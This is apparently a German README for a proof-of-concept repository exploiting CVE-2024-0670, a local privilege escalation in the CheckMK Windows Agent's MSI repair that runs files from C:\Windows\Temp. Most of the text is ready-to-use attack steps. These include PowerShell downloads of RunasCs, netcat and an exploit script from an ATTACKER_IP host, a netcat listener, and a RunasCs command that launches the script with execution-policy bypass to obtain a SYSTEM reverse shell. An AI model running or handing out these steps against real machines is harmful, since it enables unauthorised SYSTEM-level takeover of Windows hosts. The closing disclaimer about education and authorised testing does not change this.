
Dieses Repository enthält eine Exploit-Demonstration für CVE-2024-0670, eine lokale Privilegieneskalations-Schwachstelle, die den CheckMK Agent für Windows betrifft. Die Schwachstelle ermöglicht es einem Benutzer mit niedrigen Privilegien, SYSTEM-Privilegien zu erlangen, indem beschreibbare Dateipfade missbraucht werden, die vom MSI-Reparaturmechanismus verarbeitet werden.
Dieses Repository enthält einen einfachen und sauberen Proof-of-Concept für CVE-2024-0670, eine lokale Privilegienausweitungsschwachstelle im CheckMK Windows Agent. Ein Benutzer mit niedrigen Berechtigungen kann SYSTEM-Berechtigungen erlangen, indem er beschreibbare temporäre Dateipfade ausnutzt, die während der MSI-Reparatur ausgeführt werden.
Während einer MSI-Reparatur führt CheckMK Dateien unter folgendem Pfad aus:
C:\Windows\Temp\
Wenn ein normaler Benutzer dort Dateien mit vorhersagbaren Namen ablegen kann, kann er Befehle als NT AUTHORITY\SYSTEM ausführen.
Dieser Exploit platziert mehrere Payload-Dateinamen und löst die MSI-Reparatur aus, um eine SYSTEM-Ausführung zu erreichen.
RunasCs.exe → runas replacement (plaintext password support)
nc.exe → Netcat (reverse shell)
exploit.ps1 → CVE-2024-0670 exploit script
README.md → documentation
C:\Windows\Temp\
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/RunasCs.exe" -OutFile "C:\Windows\Temp\RunasCs.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/nc.exe" -OutFile "C:\Windows\Temp\nc.exe"
Invoke-WebRequest -Uri "http://ATTACKER_IP:8000/exploit.ps1" -OutFile "C:\Windows\Temp\exploit.ps1
Starten Sie einen Listener auf Ihrem Rechner:
nc -lvnp 1111
.\RunasCs.exe username "password" "powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\Windows\Temp\exploit.ps1"
Bei Erfolg erhalten Sie eine SYSTEM-Reverse-Shell.
net4:
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe -target:exe -optimize -out:RunasCs.exe RunasCs.cs
net2:
C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe -target:exe -optimize -out:RunasCs_net2.exe RunasCs.cs
Dieses Projekt dient ausschließlich zu Bildungszwecken und für autorisierte Penetrationstests. Verwenden Sie es nicht für illegale Zwecke. Der Autor übernimmt keine Verantwortung für Missbrauch.